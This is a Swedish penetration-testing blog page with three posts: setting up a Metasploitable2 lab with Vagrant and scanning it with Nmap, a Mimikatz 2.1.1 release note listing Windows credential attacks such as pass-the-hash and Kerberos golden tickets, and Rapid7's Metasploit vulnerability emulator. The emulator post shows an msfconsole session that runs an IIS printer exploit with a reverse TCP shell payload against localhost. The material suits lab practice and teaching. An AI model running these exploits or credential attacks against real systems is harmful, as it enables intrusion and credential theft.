Kategorier
Metodik

Så skapar du ett enkelt pentest-labb

Att testa nya verktyg och metoder är en viktig del för den som jobbar med penetrationstester och IT-säkerhetsgranskningar av tekniskt slag. Men det är inte alltid helt lätt att testa nya fräna verktyg och detta bör så klart göras i en kontrollerad miljö.

Därför är virtuella servrar och nätverk som skapats med hjälp av VMware eller VirtualBox till stor hjälp. Jag själv använder tre grundplåtar när jag bygger upp labbar av olika slag, dessa baseras på följande:

Efter du laddat hem virtuella images från Microsoft enligt länken ovan så kan du sedan installera ytterligare mjukvaror såsom XAMPP.

Gillar du som jag Vagrant för att förenkla din hantering av virtuella miljöer så kan du använda pentest-env på följande sätt:

$ git clone https://github.com/Sliim/pentest-env
$ cd pentest-env
$ cp examples/msf.pentestrc .

Sedan kollar du msf.pentestrc att allt ser bra ut, jag vill exempelvis enbart starta metasploitable2 så jag tar bort metasploitable3 från filen.

Sedan är det bara att kolla status samt bootstrappa och starta upp.

Första gången tar det alltid lite extra tid:

$ PENTESTRC=msf.pentestrc vagrant status
Current machine states:

metasploitable2 not created (virtualbox)

The environment has not yet been created. Run `vagrant up` to
create the environment. If a machine is not created, only the
default provider will be shown. So if a provider is not listed,
then the machine is not created for that environment.
$ PENTESTRC=msf.pentestrc vagrant up metasploitable2

Sen är det bara och vänta. Metasploitable2 tar cirka 15 minuter beroende på uppkoppling och metasploitable3 kan ta upp till 1h att starta upp och färdigställa.

Men sedan är det bara att testa på. Dubbelkontrollera bara så du kör mot rätt IP-adress, antingen via vagrant ssh eller direkt via konsolen i VirtualBox/VMware.

Sedan är det bara att testa på, exempelvis med Nmap:

$ nmap 192.168.99.100

Starting Nmap 7.01 ( https://nmap.org ) at 2017-03-21 21:11 CET
Nmap scan report for 192.168.99.100
Host is up (0.00065s latency).
Not shown: 978 closed ports
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
23/tcp open telnet
25/tcp open smtp
80/tcp open http
111/tcp open rpcbind
139/tcp open netbios-ssn
445/tcp open microsoft-ds
512/tcp open exec
513/tcp open login
514/tcp open shell
1099/tcp open rmiregistry
1524/tcp open ingreslock
2049/tcp open nfs
2121/tcp open ccproxy-ftp
3306/tcp open mysql
5432/tcp open postgresql
5900/tcp open vnc
6000/tcp open X11
6667/tcp open irc
8009/tcp open ajp13
8180/tcp open unknown

Stöter du problem kan du alltid gå via Virtualbox och inställningar där för nätverket.

Senare kommer jag även gå igenom hur du använder dig av VulnHub för att testa olika utmaningar (CTF:er etc).

Kategorier
Nyheter

Mimikatz ute i ny version

Ett av mina favoritverktyg, Mimikatz är nu ute i en ny version. Denna nya version har nummer 2.1.1 och nyheterna är följande:

  • [new] RPC support (client & server, multi users)
  • [new] Windows service support
  • [new] token::elevate can run process with impersonate token (when enough privileges and without interactions)
  • [new] process::run
  • [new] standard::hostname

Och mimi som är flexibelt kan bl.a. genomföra följande typ av attacker mot Windows:

  • Pass the Hash
  • Pass the Ticket
  • Over-Pass the Hash (Pass the Key)
  • Kerberos Golden Ticket
  • Kerberos Silver Ticket
  • Pass the Cache
  • Attacking the Kerberos Session Ticket

Följande video förevisar RPC i client-server läge:

Mimikatz kan du ladda hem via Github här:

  • https://github.com/gentilkiwi/mimikatz

Och på tal om mimikatz så är denna video rätt underhållande om hur du detekterar mimikatz:

 

 

Kategorier
Metodik

Nytt verktyg för att testa Metasploit-moduler

Ett nytt verktyg för att testa metasploit-moduler har släppts. Med hjälp av detta nya verktyg så slipper du installera en hel virtuell miljö med Metasploitable eller liknande. Även är detta nya verktyg bra vid undervisning.

Verktyget är skrivet i perl och kan emulera olika typer av tjänster som du sedan kan köraen auxiliary-modul eller exploit-modul.

Emuleringen definieras med hjälp av JSON-regler som skrivs i service.cfg filen. En tjänst som går att exploita kan se ut så här:

"exploits/windows/iis/ms01_023_printer": {
  "desc": "",
  "extraCmds": "set payload windows/shell_reverse_tcp\r\nsetg LHOST 127.0.0.1",
  "defaultPort": [80],
  "seq": [
    ["regex", "GET http:\/\/.*\/NULL.printer?"],
    ["HTTP/1.1 200 OK\r\nContent-Length: 0\r\n\r\n", ["action", ["connect", ":4444"]]]
  ]
  },

Och sedan när du ska utnyttja den så kör du enligt följande från metasploit:

msf > use exploit/windows/iis/ms01_023_printer
msf > set payload windows/shell_reverse_tcp
msf > setg RHOST 127.0.0.1
msf > setg LHOST 127.0.0.1
msf exploit(ms01_023_printer) > run

[*] Started reverse TCP handler on 127.0.0.1:4444 
[*] Command shell session 4 opened (127.0.0.1:4444 -> 127.0.0.1:51852) at 2017-01-20 10:47:12 -0600

>>ls
README.md
secret.txt
server_cert.pem
server_key.pem
service.cfg
vulEmu.pl

Du kan ladda hem verktyget från Rapid7:s Github-repo här:

https://github.com/rapid7/metasploit-vulnerability-emulator